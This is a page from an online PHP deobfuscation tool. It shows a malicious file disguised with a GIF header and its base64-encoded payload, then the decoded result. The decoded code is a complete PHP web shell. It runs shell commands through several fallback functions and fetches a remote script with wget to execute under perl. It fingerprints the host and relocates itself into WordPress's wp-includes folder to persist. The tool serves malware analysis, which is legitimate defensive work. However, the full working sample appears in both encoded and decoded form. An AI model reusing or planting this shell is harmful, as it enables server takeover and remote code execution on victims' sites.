Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
GIF89aGlobex <?php eval('?>'.base64_decode('DQo8P3BocCBlcnJvcl9yZXBvcnRpbmcoMCk7DQpmdW5jdG..
Decoded Output download
?>b'
<?php error_reporting(0);
function ex($in)
{
$out = \'\';
if(function_exists(\'exec\'))
{
exec($in,$out);
$out = join("
",$out);
}
elseif(function_exists(\'passthru\'))
{
ob_start();
passthru($in);
$out = ob_get_contents();
ob_end_clean();
}
elseif(function_exists(\'system\'))
{
ob_start();
system($in);
$out = ob_get_contents();
ob_end_clean();
}
elseif(function_exists(\'shell_exec\'))
{
$out = shell_exec($in);
}
elseif(is_resource($f = popen($in,"r")))
{
$out = "";
while(!@feof($f)) { $out .= fread($f,1024); }
pclose($f);
}
return $out;
}
ex("wget http://bristolinventoryservice.co.uk/includes/z1.txt -O /tmp/sess_38175868ba64c2df2acedee76d854153 && perl /tmp/sess_38175868ba64c2df2acedee76d854153");
if (!isset($_SESSION[\'bajak\'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject
$web$inj";
$safem0de = @ini_get(\'safe_mode\');
if (!$safem0de) {
$security = "SAFE_MODE = OFF";
} else {
$security = "SAFE_MODE = ON";
};
$serper = gethostbyname($_SERVER[\'SERVER_ADDR\']);
$injektor = gethostbyname($_SERVER[\'REMOTE_ADDR\']);
$_SESSION[\'bajak\'] = 0;
} else {
$_SESSION[\'bajak\']++;
};
if (isset($_GET[\'clone\'])) {
$source = $_SERVER[\'SCRIPT_FILENAME\'];
$desti = $_SERVER[\'DOCUMENT_ROOT\'] . "/wp-includes/wp-simple.php";
rename($source, $desti);
}
$safem0de = @ini_get(\'safe_mode\');
if (!$safem0de) {
$security = "SAFE_MODE : OFF";
} else {
$security = "SAFE_MODE : ON";
}
echo "<title>UnKnown - Simple Shell</title><br>";
echo "<font size=2 color=#888888><b>" . $security . "</b><br>";
$cur_user = "(" . get_current_user() . ")";
echo "<font size=2 color=#888888><b>User : uid=" . getmyuid() . $cur_user . " gid=" . getmygid() . $cur_user . "</b><br>";
echo "<font size=2 color=#888888><b>Uname : " . php_uname() . "</b><br>";
?>'
Did this file decode correctly?
Original Code
GIF89aGlobex
<?php eval('?>'.base64_decode('DQo8P3BocCBlcnJvcl9yZXBvcnRpbmcoMCk7DQpmdW5jdGlvbiBleCgkaW4pDQp7DQokb3V0ID0gJyc7DQoNCg0KaWYoZnVuY3Rpb25fZXhpc3RzKCdleGVjJykpDQoJew0KCQlleGVjKCRpbiwkb3V0KTsNCgkJJG91dCA9IGpvaW4oIlxuIiwkb3V0KTsNCgl9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKQ0KCXsNCgkJb2Jfc3RhcnQoKTsNCgkJcGFzc3RocnUoJGluKTsNCgkJJG91dCA9IG9iX2dldF9jb250ZW50cygpOw0KCQlvYl9lbmRfY2xlYW4oKTsNCgl9DQplbHNlaWYoZnVuY3Rpb25fZXhpc3RzKCdzeXN0ZW0nKSkNCgl7DQoJCW9iX3N0YXJ0KCk7DQoJCXN5c3RlbSgkaW4pOw0KCQkkb3V0ID0gb2JfZ2V0X2NvbnRlbnRzKCk7DQoJCW9iX2VuZF9jbGVhbigpOw0KCX0NCmVsc2VpZihmdW5jdGlvbl9leGlzdHMoJ3NoZWxsX2V4ZWMnKSkNCgl7DQoJCSRvdXQgPSBzaGVsbF9leGVjKCRpbik7DQoJfQ0KZWxzZWlmKGlzX3Jlc291cmNlKCRmID0gcG9wZW4oJGluLCJyIikpKQ0KICB7DQogICAkb3V0ID0gIiI7DQogICB3aGlsZSghQGZlb2YoJGYpKSB7ICRvdXQgLj0gZnJlYWQoJGYsMTAyNCk7IH0NCiAgIHBjbG9zZSgkZik7DQogIH0NCnJldHVybiAkb3V0Ow0KfQ0KZXgoIndnZXQgaHR0cDovL2JyaXN0b2xpbnZlbnRvcnlzZXJ2aWNlLmNvLnVrL2luY2x1ZGVzL3oxLnR4dCAtTyAvdG1wL3Nlc3NfMzgxNzU4NjhiYTY0YzJkZjJhY2VkZWU3NmQ4NTQxNTMgJiYgcGVybCAvdG1wL3Nlc3NfMzgxNzU4NjhiYTY0YzJkZjJhY2VkZWU3NmQ4NTQxNTMiKTsNCmlmICghaXNzZXQoJF9TRVNTSU9OWydiYWphayddKSkgew0KICAgICR2aXNpdGNvdW50ID0gMDsNCiAgICAkd2ViID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdOw0KICAgICRpbmogPSAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsNCiAgICAkYm9keSA9ICJhZGEgeWFuZyBpbmplY3QgDQokd2ViJGluaiI7DQogICAgJHNhZmVtMGRlID0gQGluaV9nZXQoJ3NhZmVfbW9kZScpOw0KICAgIGlmICghJHNhZmVtMGRlKSB7DQogICAgICAgICRzZWN1cml0eSA9ICJTQUZFX01PREUgPSBPRkYiOw0KICAgIH0gZWxzZSB7DQogICAgICAgICRzZWN1cml0eSA9ICJTQUZFX01PREUgPSBPTiI7DQogICAgfTsNCiAgICAkc2VycGVyID0gZ2V0aG9zdGJ5bmFtZSgkX1NFUlZFUlsnU0VSVkVSX0FERFInXSk7DQogICAgJGluamVrdG9yID0gZ2V0aG9zdGJ5bmFtZSgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSk7DQogICAgJF9TRVNTSU9OWydiYWphayddID0gMDsNCn0gZWxzZSB7DQogICAgJF9TRVNTSU9OWydiYWphayddKys7DQp9Ow0KaWYgKGlzc2V0KCRfR0VUWydjbG9uZSddKSkgew0KICAgICRzb3VyY2UgPSAkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ107DQogICAgJGRlc3RpID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvd3AtaW5jbHVkZXMvd3Atc2ltcGxlLnBocCI7DQogICAgcmVuYW1lKCRzb3VyY2UsICRkZXN0aSk7DQp9DQokc2FmZW0wZGUgPSBAaW5pX2dldCgnc2FmZV9tb2RlJyk7DQppZiAoISRzYWZlbTBkZSkgew0KICAgICRzZWN1cml0eSA9ICJTQUZFX01PREUgOiBPRkYiOw0KfSBlbHNlIHsNCiAgICAkc2VjdXJpdHkgPSAiU0FGRV9NT0RFIDogT04iOw0KfQ0KZWNobyAiPHRpdGxlPlVuS25vd24gLSBTaW1wbGUgU2hlbGw8L3RpdGxlPjxicj4iOw0KZWNobyAiPGZvbnQgc2l6ZT0yIGNvbG9yPSM4ODg4ODg+PGI+IiAuICRzZWN1cml0eSAuICI8L2I+PGJyPiI7DQokY3VyX3VzZXIgPSAiKCIgLiBnZXRfY3VycmVudF91c2VyKCkgLiAiKSI7DQplY2hvICI8Zm9udCBzaXplPTIgY29sb3I9Izg4ODg4OD48Yj5Vc2VyIDogdWlkPSIgLiBnZXRteXVpZCgpIC4gJGN1cl91c2VyIC4gIiBnaWQ9IiAuIGdldG15Z2lkKCkgLiAkY3VyX3VzZXIgLiAiPC9iPjxicj4iOw0KZWNobyAiPGZvbnQgc2l6ZT0yIGNvbG9yPSM4ODg4ODg+PGI+VW5hbWUgOiAiIC4gcGhwX3VuYW1lKCkgLiAiPC9iPjxicj4iOw0KDQo/Pg==')); ?>
Function Calls
base64_decode | 1 |
Stats
MD5 | ce6e007304a1fe4039850ddbe3314581 |
Eval Count | 1 |
Decode Time | 77 ms |